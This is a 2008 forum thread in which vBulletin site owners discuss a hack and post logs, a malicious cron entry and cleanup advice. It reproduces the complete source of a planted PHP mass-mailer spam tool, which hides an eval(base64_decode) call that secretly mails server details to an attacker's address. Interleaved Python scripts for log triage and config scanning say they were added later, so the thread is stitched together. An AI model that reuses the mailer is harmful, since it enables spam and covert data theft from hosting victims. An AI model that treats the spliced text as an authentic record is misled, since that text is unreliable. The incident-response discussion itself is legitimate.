:) HaCkEd aGaIn :)
iogames
09-20-2008, 02:45 AM
I was reading in the morning that someone was hacked and I thought: I'm gonna find the time to write a good 'Guide for the Hacked' so users don't get hysterical about the problem, and ZAZ! my site was hacked :P but I didn't get all scared; good thing that I know the structure of my server/files by memory... but it must be interesting to analyze/dissect the attacks for future reference...
I don't know if it's improper to post this, please advise me if so... but here is the main file which steals your cP password: CONFIGSCAN.PHP
*** Script removed, no need to post a script to hack a site ***
p.s. I fixed very calmly my problem :)
SEOvB
09-20-2008, 02:58 AM
wouldn't they still need a way to get that file on your server?
Lynne
09-20-2008, 03:21 AM
wouldn't they still need a way to get that file on your server?
This was gonna be my question. That is what I would be freaking out over!
iogames
09-20-2008, 03:45 AM
In fact I said: I always take it calmly... not that I'm an expert :D
I just checked head over heels, and although I said to my hosting service that it might be a shell thing, they say it's a script-related thing... so I don't argue; I go to the logs, clean everything and change passwords...
It came with many 'strange foreign files'
Any idea what that script compromises?
p.s. I consider a toothache more important than a vBulletin board hacked
--------------- Added later ---------------
and everything starts here:
212.100.250.218 - - [11/Sep/2008:11:03:48 -0600] "GET /cpanel HTTP/1.0" 301 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:34 -0600] "GET /version.php HTTP/1.0" 200 63599 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:29 -0600] "GET /configscan.php HTTP/1.0" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
41.219.229.144 - - [11/Sep/2008:11:09:54 -0600] "GET /configscan.php HTTP/1.1" 200 1813 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
41.219.229.144 - - [11/Sep/2008:11:26:00 -0600] "GET /yomistarz/yomistarz.php HTTP/1.1" 200 3698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
212.100.250.218 - - [12/Sep/2008:03:24:41 -0600] "POST /GuXnnQshoT.php HTTP/1.0" 200 25610 "http://iogames.com/GuXnnQshoT.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16)
England & Nigeria :rolleyes:
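The log lines above are the first useful evidence in this thread: two addresses request a cPanel login page, then PHP files that were never part of the site, and the server answers 200. The following triage script is an added example, not code from the post or from vBulletin; it parses combined-log lines, flags any .php request served with 200 whose path is not in an assumed inventory of known site files (KNOWN_PATHS is an assumption, as is the benign 10.0.0.5 line), and keeps every address's full request list so the analyst can pull the rest of the session.

```python
import re
from collections import defaultdict

# Constructed sample in Apache combined-log format. The first four lines mirror
# the requests quoted in the post (same IPs and paths, user-agents shortened);
# the 10.0.0.5 line is an invented benign request for contrast.
SAMPLE_LOG = """\
212.100.250.218 - - [11/Sep/2008:11:03:48 -0600] "GET /cpanel HTTP/1.0" 301 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
212.100.250.218 - - [11/Sep/2008:11:07:29 -0600] "GET /configscan.php HTTP/1.0" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
41.219.229.144 - - [11/Sep/2008:11:26:00 -0600] "GET /yomistarz/yomistarz.php HTTP/1.1" 200 3698 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
212.100.250.218 - - [12/Sep/2008:03:24:41 -0600] "POST /GuXnnQshoT.php HTTP/1.0" 200 25610 "http://iogames.com/GuXnnQshoT.php" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2008:03:30:00 -0600] "GET /forum/index.php?f=1 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Assumed inventory of PHP entry points that legitimately exist on the site.
# A real run would build this list from the installed package's file manifest.
KNOWN_PATHS = {"/forum/index.php", "/forum/showthread.php", "/version.php"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def triage(log_text, known_paths):
    """Return (findings, per_ip).

    findings: (ip, timestamp, method, path) for each .php request served with
              200 whose path is not in the inventory: a script that should
              not exist on the server.
    per_ip:   every path requested, grouped by client address.
    """
    findings = []
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # drop the query string
        per_ip[rec["ip"]].append(path)
        if (path.lower().endswith(".php") and path not in known_paths
                and rec["status"] == "200"):
            findings.append((rec["ip"], rec["ts"], rec["method"], path))
    return findings, dict(per_ip)
```

The 301 for /cpanel is not flagged by this rule, but it is in the same address's session list, which is what makes the later hits on unknown scripts worth escalating.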
Lynne
09-20-2008, 04:02 AM
p.s. I consider a toothache more important than a vBulletin board hacked
But do your users agree with that! ;)
iogames
09-20-2008, 04:47 AM
'Naija Bois Too Much '
https://vborg.vbsupport.ru/external/2008/09/2.gif
Info in the files; I called my Nigerian friend OSUJI, and he told me it is a bragging gang term...
To avoid this file finding out your password, change the config.php file so that it is not a one-liner, but more lines. Especially the password parts.
iogames
09-21-2008, 04:26 AM
The only thing I regret is to lose my SuperSecure password: it was a word I created with Latin & Greek roots, combined with numbers and must be entered sitting over your head singing Jingle bells in Zulu :D
The only FTP connection I see is on 9/14/2008
14 40 7.86% 40 files 153kb
Over .png files :p
puertoblack2003
09-21-2008, 05:11 AM
I remember reading something on how to protect config.php; there's info here on protecting your file using .htaccess: http://www.sitebuddy.com/php/VBulletin_protect_config.php_with_.htaccess hope that helps :)
Or CHMOD it to 600 ;), this allows the script to be accessed via your vBulletin/server files, but not via users :), I use this for my products.
Ahmed-Rabe3
09-21-2008, 09:12 AM
Me too, my site is hacked
iogames
09-21-2008, 02:43 PM
I think they weren't after vB since they just injected stuff to spam, and I discovered a new email account on my cP with high activity...
2 more files [since this is moved to a discussion forum]
yomistarz.php
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>|| InboX Mass Mailer ||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="FF9900" text="#ffffff">
<span class="style1">InboX Mass Mailer<br>
</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" >
Plain Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "spammed<br>";
flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmloYWNrQGdtYWlsLmNvbSIsICRzdWJqOTgsIC Rtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright © 2007 phpbb.com
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>
and a file named SS.PHP with 6k lines
Why don't we counterattack? I mean, we are the majority; together we know more than these pranksters...
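Two things in this thread are checkable on disk: puertoblack2003's advice that config.php should be mode 600, and the tell-tale eval(base64_decode(...)) at the end of the mailer posted above. The scanner below is an added example, not code from the thread or from vBulletin; it walks a web root, reports config files that group or other can read, and reports PHP files that eval base64-decoded code. make_sample_webroot builds a constructed demo tree (file names and contents are assumptions) so it can be run without a real site.

```python
import os
import re
import stat
import tempfile

# Files the thread says the harvesting script reads for database/cPanel
# credentials (vBulletin's config.php, IPB's conf_global.php).
CONFIG_NAMES = {"config.php", "conf_global.php"}
# The obfuscation used at the end of the posted mailer: eval(base64_decode(...)).
OBFUSCATED = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def config_readable_by_others(path):
    """True if group or other can read the file, i.e. the mode is looser than 600."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

def audit_webroot(root):
    """Walk root; return {'readable_configs': [...], 'suspicious_php': [...]}."""
    report = {"readable_configs": [], "suspicious_php": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name in CONFIG_NAMES and config_readable_by_others(path):
                report["readable_configs"].append(path)
            if name.lower().endswith(".php"):
                with open(path, "rb") as fh:          # scan bytes, not text
                    if OBFUSCATED.search(fh.read()):
                        report["suspicious_php"].append(path)
    return report

def make_sample_webroot():
    """Constructed demo tree (assumed names/contents): one loose config, one
    correctly locked config, one obfuscated script, one benign script."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "forum"))
    files = {
        "forum/config.php": (0o644, b"<?php $config['MasterServer']['password'] = 'secret'; ?>"),
        "conf_global.php": (0o600, b"<?php $INFO['sql_pass'] = 'secret'; ?>"),
        "yomistarz.php": (0o644, b'<?php echo eval(base64_decode("aGVsbG8="));?>'),
        "index.php": (0o644, b"<?php echo base64_decode('aGVsbG8='); ?>"),
    }
    for rel, (mode, body) in files.items():
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, mode)   # chmod sets the exact mode regardless of umask
    return root

if __name__ == "__main__":
    for kind, paths in audit_webroot(make_sample_webroot()).items():
        print(kind, paths)
```

Mode 600 only works when PHP runs as the file's owner (suPHP/suEXEC style, as on cPanel hosts); under a shared mod_php user the .htaccess deny is the option that does not break the site.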
iPodHacking.com
09-21-2008, 02:49 PM
Is that a spam php script?
MiskaTorn
09-21-2008, 03:08 PM
I got hacked with that script too, no clue how they got it on my server.
Though the only thing running on my web server is vbulletin.
iogames
09-21-2008, 05:22 PM
Well, the problem was resolved in a few hours; I found this in cPanel's Cron Job section:
public_html/auctions/components/y2kupdate >/dev/null 2>&1
balance12
09-21-2008, 05:45 PM
Wow... I have a "hackers problem": someone is injecting shells into my site ("c99")....
agitated
09-21-2008, 07:00 PM
@iogames
I'm confused as to what you are trying to tell us here.
You've not confirmed how they gained access.
How did they get the files into your directories?
Did you have a backdoor open, or was it via another site on the shared hosting?
Would it not be more helpful to let people know exactly what version of vBulletin you have installed,
what hacks are installed,
and also what else you have running on your site?
If people see something in common then it may help to close a vulnerability that may have been exploited.
iogames
09-21-2008, 07:16 PM
Ok...
I was so busy that I didn't touch my site for days, till one day I got some spare time and started working on it again... I had lost my access to cPanel; I just reset the password and they sent the current password to my email, then I started to look at what was going on, and found those foreign files (they didn't remove anything), then I started an assessment of the problem, and started posting:
So basically I don't know if it was due to a third-party script or shell injection. Hosters will never accept that there was fault on their part; I just received their help and advice...
- CronJobs
- Inserted files
- FTP Logs
- Raw Logs
- .htaccess
- Change of passwords
- Check integrity of the MySQL dBs
- Eliminate unknown files, etc...
esperone
09-22-2008, 12:24 PM
Here's the guy's email address: grofihack@gmail.com
I decoded the base64 encoded part of the posted script
iogames
09-22-2008, 02:59 PM
Here's the guy's email address: grofihack@gmail.com
I decoded the base64 encoded part of the posted script
See? We must fight back and not play victims...
After they run out of tricks, they must start running ;)
Dzelil
09-22-2008, 09:53 PM
Well, as it seems, the file that gets cPanel logins scans all directories on a server that are open and reads files such as config.php, conf_global.php etc. for the user login and password for MySQL (or whatever you use) and then tries it on the directories' FTP and gives the hackers the results as to how many he can access on the server within seconds.. no ++++ing around, very simple job...
But how did they get the file on your server in the 1st place? Maybe another vuln in vB again?
iogames
09-22-2008, 10:14 PM
Well, as it seems, the file that gets cPanel logins scans all directories on a server that are open and reads files such as config.php, conf_global.php etc. for the user login and password for MySQL (or whatever you use) and then tries it on the directories' FTP and gives the hackers the results as to how many he can access on the server within seconds.. no ++++ing around, very simple job...
But how did they get the file on your server in the 1st place? Maybe another vuln in vB again?
If there's another vulnerability in vB [which I don't believe] we will just have the denial as from my hosting service [which I really believe]... to be accurate I don't know, but I uninstalled 3 scripts...
I was blaming my auction site, but another user in this thread mentioned being a victim of the same attack and that his/her server only hosts vB...
So we are alone on this till someone more kind/prepared re-structure the rules of engagement...
iogames
09-28-2008, 01:51 PM
It reminds me of this:
http://www.youtube.com/watch?v=DyEGYo_C0r4
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.